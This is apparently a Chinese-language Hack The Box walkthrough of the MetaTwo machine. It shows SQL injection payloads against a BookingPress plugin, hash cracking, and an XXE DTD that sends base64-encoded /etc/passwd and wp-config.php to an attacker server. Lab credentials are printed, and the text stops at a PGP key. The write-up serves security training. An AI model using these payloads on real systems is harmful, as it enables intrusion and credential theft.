信息收集 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB] └─ Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 14:53 AEST Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 66.67% done ; ETC: 14:57 (0:01:15 remaining) Nmap scan report for 10.129.231.241 Host is up (0.0093s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp? 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) 80/tcp open http nginx 1.18.0 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done : 1 IP address (1 host up) scanned in 161.02 seconds
If we go to http://$IP, we are redirected to http://metapress.htb, so we need to add this domain in /etc/hosts
1 2 vim /etc/host $IP metapress.htb
使用浏览器插件Wappalyzer检查wordpress版本,php版本。
1 2 WordPress 5.6.2 PHP 8.0.24
SQL注入 进入到网站event目录下,检查源码发现bookingpress plugin版本是1.0.10,存在漏洞CVE-2022-0739
在网页源码中找到字段_wpnonce对应的值1d0870781e,使用https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357/ POC进行探测。
1 2 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB] └─
返回结果如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB] └─ HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 15 Sep 2024 05:25:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.0.24 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin [{"bookingpress_service_id" :"10.5.15-MariaDB-0+deb11u1" ,"bookingpress_category_id" :"Debian 11" ,"bookingpress_service_name" :"debian-linux-gnu" ,"bookingpress_service_price" :"$1 .00" ,"bookingpress_service_duration_val" :"2" ,"bookingpress_service_duration_unit" :"3" ,"bookingpress_service_description" :"4" ,"bookingpress_service_position" :"5" ,"bookingpress_servicedate_created" :"6" ,"service_price_without_currency" :1,"img_url" :"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg" }]
此结果说明确实存在Sql注入漏洞。
方法1 使用sqlmap
1 2 3 sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=1d0870781e&catego ry_id=123&total_service=111" -p total_service --level=5 --risk=3 --dbs
扫描结果:
1 2 3 4 5 6 7 8 9 10 11 [15:30:38] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.0.24, Nginx 1.18.0 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [15:30:38] [INFO] fetching database names available databases [2]: [*] blog [*] information_schema [15:30:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb' [*] ending @ 15:30:38 /2024-09-15/
继续:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB] └─ ___ __H__ ___ ___["]_____ ___ ___ {1.8.8#stable} |_ -| . [)] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 15:31:57 /2024-09-15/ [15:31:57] [INFO] resuming back-end DBMS 'mysql' [15:31:57] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: total_service (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: action=bookingpress_front_get_category_services&_wpnonce=1d0870781e&category_id=123&total_service=-3077) OR 8095=8095-- ISEb Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=bookingpress_front_get_category_services&_wpnonce=1d0870781e&category_id=123&total_service=111) AND (SELECT 5120 FROM (SELECT(SLEEP(5)))WRSg)-- lhbW Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: action=bookingpress_front_get_category_services&_wpnonce=1d0870781e&category_id=123&total_service=111) UNION ALL SELECT NULL,CONCAT(0x717a767171,0x4253565341777451764c4358734e655958576c53574e484873657447514d6c4365647363534f6255,0x716a627671),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- [15:31:57] [INFO] the back-end DBMS is MySQL web application technology: Nginx 1.18.0, PHP 8.0.24 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [15:31:57] [INFO] fetching tables for database: 'blog' Database: blog [27 tables] +--------------------------------------+ | wp_bookingpress_appointment_bookings | | wp_bookingpress_categories | | wp_bookingpress_customers | | wp_bookingpress_customers_meta | | wp_bookingpress_customize_settings | | wp_bookingpress_debug_payment_log | | wp_bookingpress_default_daysoff | | wp_bookingpress_default_workhours | | wp_bookingpress_entries | | wp_bookingpress_form_fields | | wp_bookingpress_notifications | | wp_bookingpress_payment_logs | | wp_bookingpress_services | | wp_bookingpress_servicesmeta | | wp_bookingpress_settings | | wp_commentmeta | | wp_comments | | wp_links | | wp_options | | wp_postmeta | | wp_posts | | wp_term_relationships | | wp_term_taxonomy | | wp_termmeta | | wp_terms | | wp_usermeta | | wp_users | +--------------------------------------+ [15:31:57] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb' [*] ending @ 15:31:57 /2024-09-15/
表wp_users中存放着用户数据信息。对此表进行爆破
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB] └─ Database: blog Table: wp_users [2 entries] +----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+ | ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key | +----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+ | 1 | http://metapress.htb | $P$BGrGrgf2wToBS79i07Rk9sN4Fzk .TV. | admin@metapress.htb | admin | 0 | admin | admin | 2022-06-23 17:58:28 | <blank> | | 2 | <blank> | $P$B4aNM28N0E .tMy/JIcnVMZbGcU16Q70 | manager@metapress.htb | manager | 0 | manager | manager | 2022-06-23 18:07:55 | <blank> | +----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+ [15:38:24] [INFO] table 'blog.wp_users' dumped to CSV file '/root/.local/share/sqlmap/output/metapress.htb/dump/blog/wp_users.csv' [15:38:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb' [*] ending @ 15:38:24 /2024-09-15/
得到了用户密码哈希。
1 2 admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70
方法2 使用exp: https://github.com/destr4ct/CVE-2022-0739/blob/main/booking-press-expl.py
运行,很快就出结果了:
1 2 3 4 5 6 7 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─ - BookingPress PoC -- Got db fingerprint: 10.5.15-MariaDB-0+deb11u1 -- Count of users : 2 |admin|admin@metapress.htb|$P$BGrGrgf2wToBS79i07Rk9sN4Fzk .TV.| |manager|manager@metapress.htb|$P$B4aNM28N0E .tMy/JIcnVMZbGcU16Q70|
方法3 msf一把梭:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 msf6 > search bookingpress Matching Modules ================ - ---- --------------- ---- ----- ----------- 0 auxiliary/gather/wp_bookingpress_category_services_sqli 2022-02-28 normal Yes Wordpress BookingPress bookingpress_front_get_category_services SQLi Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/wp_bookingpress_category_services_sqli msf6 > use 0 msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set RHOST metapress.htb RHOST => metapress.htb msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set TARGETURI /events/ TARGETURI => /events/ msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run [*] Running module against 10.129.231.241 [*] Running automatic check ("set AutoCheck false" to disable ) [+] The target is vulnerable. [*] Extracting credential information Wordpress User Credentials ========================== Username Email Hash -------- ----- ---- admin admin@metapress.htb $P$BGrGrgf2wToBS79i07Rk9sN4Fzk .TV. manager manager@metapress.htb $P$B4aNM28N0E .tMy/JIcnVMZbGcU16Q70 [*] Auxiliary module execution completed
爆破哈希 将哈希值保存到文件
1 2 3 4 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─ admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk .TV. manager:$P$B4aNM28N0E .tMy/JIcnVMZbGcU16Q70
使用kali自带工具John The Ripper 对哈希进行爆破
爆破结果:
1 2 3 4 5 6 7 8 9 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─ Created directory: /root/.john Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 ASIMD 4x2]) Cost 1 (iteration count) is 8192 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status partylikearockstar (manager)
用户名密码:
1 manager:partylikearockstar
利用XXE漏洞获得user_flag 用此密码登陆到默认目录:/wp-admin
根据网上查到到的信息,此版本的wordpress存在XXE漏洞CVE-2021-29447
https://wpscan.com/wordpress/562/
https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5/
https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/
https://tryhackme.com/r/room/wordpresscve202129447
We need two files, payload.wav and evil.dtd .
1 2 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─
Note: Make sure to input the IP of your tun0 interface in the above payload.
创建文件evil.dtd
1 2 <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"> <!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.8:8080/?p=%file;'>" >
利用python开启http服务器。
1 python3 -m http.server 8080
打开网页,向Wordpress Media Library中上传刚才创建的.wav文件
上传文件后,我们会在 Web 服务器上收到以下包含 base64 编码数据的请求。
1 2 3 4 5 6 7 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─ Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ... 10.129.231.241 - - [15/Sep/2024 16:37:30] "GET /evil.dtd HTTP/1.1" 200 - 10.129.231.241 - - [15/Sep/2024 16:37:30] "GET /?p=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovcnVuL2lyY2Q6L3Vzci9zYmluL25vbG9naW4KZ25hdHM6eDo0MTo0MTpHbmF0cyBCdWctUmVwb3J0aW5nIFN5c3RlbSAoYWRtaW4pOi92YXIvbGliL2duYXRzOi91c3Ivc2Jpbi9ub2xvZ2luCm5vYm9keTp4OjY1NTM0OjY1NTM0Om5vYm9keTovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwMDo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMToxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMjoxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDk6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzc2hkOng6MTA0OjY1NTM0OjovcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4Kam5lbHNvbjp4OjEwMDA6MTAwMDpqbmVsc29uLCwsOi9ob21lL2puZWxzb246L2Jpbi9iYXNoCnN5c3RlbWQtdGltZXN5bmM6eDo5OTk6OTk5OnN5c3RlbWQgVGltZSBTeW5jaHJvbml6YXRpb246LzovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLWNvcmVkdW1wOng6OTk4Ojk5ODpzeXN0ZW1kIENvcmUgRHVtcGVyOi86L3Vzci9zYmluL25vbG9naW4KbXlzcWw6eDoxMDU6MTExOk15U1FMIFNlcnZlciwsLDovbm9uZXhpc3RlbnQ6L2Jpbi9mYWxzZQpwcm9mdHBkOng6MTA2OjY1NTM0OjovcnVuL3Byb2Z0cGQ6L3Vzci9zYmluL25vbG9naW4KZnRwOng6MTA3OjY1NTM0Ojovc3J2L2Z0cDovdXNyL3NiaW4vbm9sb2dpbgo= HTTP/1.1" 200 - 10.129.231.241 - - [15/Sep/2024 16:37:30] "GET /evil.dtd HTTP/1.1" 200 - 10.129.231.241 - - [15/Sep/2024 16:37:30] "GET /?p=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovcnVuL2lyY2Q6L3Vzci9zYmluL25vbG9naW4KZ25hdHM6eDo0MTo0MTpHbmF0cyBCdWctUmVwb3J0aW5nIFN5c3RlbSAoYWRtaW4pOi92YXIvbGliL2duYXRzOi91c3Ivc2Jpbi9ub2xvZ2luCm5vYm9keTp4OjY1NTM0OjY1NTM0Om5vYm9keTovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwMDo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMToxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMjoxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDk6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzc2hkOng6MTA0OjY1NTM0OjovcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4Kam5lbHNvbjp4OjEwMDA6MTAwMDpqbmVsc29uLCwsOi9ob21lL2puZWxzb246L2Jpbi9iYXNoCnN5c3RlbWQtdGltZXN5bmM6eDo5OTk6OTk5OnN5c3RlbWQgVGltZSBTeW5jaHJvbml6YXRpb246LzovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLWNvcmVkdW1wOng6OTk4Ojk5ODpzeXN0ZW1kIENvcmUgRHVtcGVyOi86L3Vzci9zYmluL25vbG9naW4KbXlzcWw6eDoxMDU6MTExOk15U1FMIFNlcnZlciwsLDovbm9uZXhpc3RlbnQ6L2Jpbi9mYWxzZQpwcm9mdHBkOng6MTA2OjY1NTM0OjovcnVuL3Byb2Z0cGQ6L3Vzci9zYmluL25vbG9naW4KZnRwOng6MTA3OjY1NTM0Ojovc3J2L2Z0cDovdXNyL3NiaW4vbm9sb2dpbgo= HTTP/1.1" 200 -
base64解码结果:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync :x:4:65534:sync :/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:109::/nonexistent:/usr/sbin/nologin sshd:x:104:65534::/run/sshd:/usr/sbin/nologin jnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash systemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin mysql:x:105:111:MySQL Server,,,:/nonexistent:/bin/false proftpd:x:106:65534::/run/proftpd:/usr/sbin/nologin ftp:x:107:65534::/srv/ftp:/usr/sbin/nologin
根据此结果判断,有个叫jnelson的普通用户存在。
修改evil.dtd文件内容,用于获取wp_config.php配置文件信息
1 2 <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=../wp-config.php"> <!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.8:8080/?p=%file;'>" >
重复上述上传过程,并解码返回的信息,得到如下内容:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 <?php define ( 'DB_NAME' , 'blog' );define ( 'DB_USER' , 'blog' );define ( 'DB_PASSWORD' , '635Aq@TdqrCwXFUZ' );define ( 'DB_HOST' , 'localhost' );define ( 'DB_CHARSET' , 'utf8mb4' );define ( 'DB_COLLATE' , '' );define ( 'FS_METHOD' , 'ftpext' );define ( 'FTP_USER' , 'metapress.htb' );define ( 'FTP_PASS' , '9NYS_ii@FyL_p5M2NvJ' );define ( 'FTP_HOST' , 'ftp.metapress.htb' );define ( 'FTP_BASE' , 'blog/' );define ( 'FTP_SSL' , false );define ( 'AUTH_KEY' , '?!Z$uGO*A6xOE5x,pweP4i*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n>+3m?.B/:' );define ( 'SECURE_AUTH_KEY' , 'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' );define ( 'LOGGED_IN_KEY' , 'J+mxCaP4z<g.6P^t`ziv>dd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' );define ( 'NONCE_KEY' , 'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' );define ( 'AUTH_SALT' , '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*<~:0]s}d<&M;.,x0z~R>3!D' );define ( 'SECURE_AUTH_SALT' , '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' );define ( 'LOGGED_IN_SALT' , '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' );define ( 'NONCE_SALT' , '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' );$table_prefix = 'wp_' ;define ( 'WP_DEBUG' , false );if ( ! defined ( 'ABSPATH' ) ) { define ( 'ABSPATH' , __DIR__ . '/' ); } require_once ABSPATH . 'wp-settings.php' ;
通过此信息,获得了FTP服务器的用户名和密码
1 2 username : metapress.htb password : 9NYS_ii@FyL_p5M2NvJ
连接到FTP服务器:
1 2 3 4 5 6 7 8 9 10 ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─ Connected to 10.129.231.241. 220 ProFTPD Server (Debian) [::ffff:10.129.231.241] 331 Password required for metapress.htb Password: 230 User metapress.htb logged in Remote system type is UNIX. Using binary mode to transfer files. ftp>
在 ftp 服务器中,找到了邮件服务器的源代码和一个向所有用户发送电子邮件的脚本send_mail.php,其中包含 jnelson 用户的凭据
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ftp> ls 229 Entering Extended Passive Mode (|||15602|) 150 Opening ASCII mode data connection for file list drwxr-xr-x 5 metapress.htb metapress.htb 4096 Oct 5 2022 blog drwxr-xr-x 3 metapress.htb metapress.htb 4096 Oct 5 2022 mailer 226 Transfer complete ftp> cd mailer 250 CWD command successful ftp> ls 229 Entering Extended Passive Mode (|||2643|) 150 Opening ASCII mode data connection for file list drwxr-xr-x 4 metapress.htb metapress.htb 4096 Oct 5 2022 PHPMailer -rw-r--r-- 1 metapress.htb metapress.htb 1126 Jun 22 2022 send_email.php 226 Transfer complete ftp> get send_email.php local : send_email.php remote: send_email.php229 Entering Extended Passive Mode (|||61637|) 150 Opening BINARY mode data connection for send_email.php (1126 bytes) 100% |**************************************************************| 1126 15.12 MiB/s 00:00 ETA 226 Transfer complete 1126 bytes received in 00:00 (145.75 KiB/s)
在ftp中使用get命令将此文件下载到本地查看:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 <?php use PHPMailer \PHPMailer \PHPMailer ;use PHPMailer \PHPMailer \SMTP ;use PHPMailer \PHPMailer \Exception ;require 'PHPMailer/src/Exception.php' ;require 'PHPMailer/src/PHPMailer.php' ;require 'PHPMailer/src/SMTP.php' ;$mail = new PHPMailer (true );$mail ->SMTPDebug = 3 ; $mail ->isSMTP (); $mail ->Host = "mail.metapress.htb" ;$mail ->SMTPAuth = true ; $mail ->Username = "jnelson@metapress.htb" ; $mail ->Password = "Cb4_JmWM8zUZWMu@Ys" ; $mail ->SMTPSecure = "tls" ; $mail ->Port = 587 ; $mail ->From = "jnelson@metapress.htb" ;$mail ->FromName = "James Nelson" ;$mail ->addAddress ("info@metapress.htb" );$mail ->isHTML (true );$mail ->Subject = "Startup" ;$mail ->Body = "<i>We just started our new blog metapress.htb!</i>" ;try { $mail ->send (); echo "Message has been sent successfully" ; } catch (Exception $e ) { echo "Mailer Error: " . $mail ->ErrorInfo; }
结合之前获得的/etc/passwd文件,有个叫jnelson的用户存在,在此处获得了密码。
1 2 $mail->Username = "jnelson@metapress.htb"; $mail->Password = "Cb4_JmWM8zUZWMu@Ys";
利用ssh登陆:
获取到user_flag:
1 0a432515f485c621b015cefe55d1e72e
提权获得root_flag 查看到其中有一个隐藏文件夹passpie
1 2 3 4 5 6 7 8 9 10 11 jnelson@meta2:~$ ls -la total 32 drwxr-xr-x 4 jnelson jnelson 4096 Oct 25 2022 . drwxr-xr-x 3 root root 4096 Oct 5 2022 .. lrwxrwxrwx 1 root root 9 Jun 26 2022 .bash_history -> /dev/null -rw-r--r-- 1 jnelson jnelson 220 Jun 26 2022 .bash_logout -rw-r--r-- 1 jnelson jnelson 3526 Jun 26 2022 .bashrc drwxr-xr-x 3 jnelson jnelson 4096 Oct 25 2022 .local dr-xr-x--- 3 jnelson jnelson 4096 Oct 25 2022 .passpie -rw-r--r-- 1 jnelson jnelson 807 Jun 26 2022 .profile -rw-r----- 1 root jnelson 33 Sep 15 05:47 user.txt
上网查到,这是一个python写的密码管理器。
根据官网文档,可以使用命令导出密码。
1 passpie export password.db
The .keys file contains gpg keys which contain the passpie passphrase.
1 2 3 4 5 6 7 jnelson@meta2://home/jnelson/.passpie$ ls -la total 24 dr-xr-x--- 3 jnelson jnelson 4096 Oct 25 2022 . drwxr-xr-x 4 jnelson jnelson 4096 Oct 25 2022 .. -r-xr-x--- 1 jnelson jnelson 3 Jun 26 2022 .config -r-xr-x--- 1 jnelson jnelson 5243 Jun 26 2022 .keys dr-xr-x--- 2 jnelson jnelson 4096 Oct 25 2022 ssh
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 jnelson@meta2://home/jnelson/.passpie$ cat .keys -----BEGIN PGP PUBLIC KEY BLOCK----- mQSuBGK4V9YRDADENdPyGOxVM7hcLSHfXg+21dENGedjYV1gf9cZabjq6v440NA1 AiJBBC1QUbIHmaBrxngkbu/DD0gzCEWEr2pFusr/Y3yY4codzmteOW6Rg2URmxMD /GYn9FIjUAWqnfdnttBbvBjseL4sECpmgxTIjKbWAXlqgEgNjXD306IweEy2FOho 3LpAXxfk8C/qUCKcpxaz0G2k0do4+VTKZ+5UDpqM5++soJqhCrUYudb9zyVyXTpT ZjMvyXe5NeC7JhBCKh+/Wqc4xyBcwhDdW+WU54vuFUthn+PUubEN1m+s13BkyvHV gNAM4v6terRItXdKvgvHtJxE0vhlNSjFAedACHC4sN+dRqFu4li8XPIVYGkuK9pX 5xA6Nj+8UYRoZrP4SYtaDslT63ZaLd2MvwP+xMw2XEv8Uj3TGq6BIVWmajbsqkEp tQkU7d+nPt1aw2sA265vrIzry02NAhxL9YQGNJmXFbZ0p8cT3CswedP8XONmVdxb a1UfdG+soO3jtQsBAKbYl2yF/+D81v+42827iqO6gqoxHbc/0epLqJ+Lbl8hC/sG 